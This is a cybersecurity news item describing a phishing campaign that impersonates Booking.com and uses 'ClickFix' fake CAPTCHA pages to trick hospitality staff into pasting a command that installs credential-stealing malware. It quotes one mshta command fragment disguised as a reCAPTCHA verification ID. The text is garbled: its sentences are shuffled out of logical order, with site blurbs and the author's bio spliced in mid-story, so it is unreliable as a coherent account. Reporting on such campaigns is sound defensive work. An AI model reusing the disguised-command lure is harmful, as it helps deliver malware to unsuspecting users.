Security analysts at Microsoft noted that this campaign employs a technique called “ClickFix,” which displays fake error messages instructing users to execute commands that download malware. The addition of ClickFix to their tactics shows how this threat actor evolves to circumvent security measures, specifically targeting hospitality staff who regularly interact with Booking.com as part of their duties. These messages contain malicious links or PDF attachments leading to fraudulent websites that mimic Booking.com’s legitimate pages, creating a convincing illusion to trick unsuspecting victims. When victims click the malicious links, they see a webpage with a fake CAPTCHA overlay instructing them to use a keyboard shortcut to open Windows Run and paste a command that’s automatically copied to their clipboard. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis. This social engineering method takes advantage of human problem-solving tendencies to bypass conventional security measures by requiring user interaction rather than relying on automated execution. The malware’s capabilities include stealing stored passwords from browsers, capturing financial information, and potentially providing remote access to compromised systems, allowing attackers to conduct further malicious activities within the victim’s network. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news. This seemingly innocuous command initiates the download of dangerous malware without triggering conventional security alerts. Microsoft Threat Intelligence has identified an ongoing phishing campaign impersonating Booking.com to deliver credential-stealing malware. The design mimics legitimate security verification systems, giving victims a false sense of security. This command typically uses mshta.exe to download malicious code, such as: “mshta # ‘I am not a robot – reCAPTCHA Verification ID: 3781′”. Tushar is a Cyber security content editor with a passion for creating captivating and informative content. The attackers send fake emails purporting to be from Booking.com, with content ranging from negative guest reviews to account verification requests.
This Cyber News was published on cybersecuritynews.com. Publication date: Fri, 14 Mar 2025 11:10:13 +0000